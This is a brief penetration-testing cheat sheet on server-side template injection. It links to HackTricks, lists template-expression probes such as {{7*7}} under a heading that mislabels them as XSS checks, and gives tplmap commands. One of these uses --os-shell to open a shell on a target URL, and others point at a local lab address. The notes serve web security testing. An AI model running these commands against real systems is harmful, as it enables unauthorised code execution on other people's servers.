# SERVER SIDE TEMPLATE INJECTION (SSTI)

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

--handlebars NodeJS
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs



# Cross Site Scripting (XSS)

--Check XSS

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Example of Tplmap:

python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
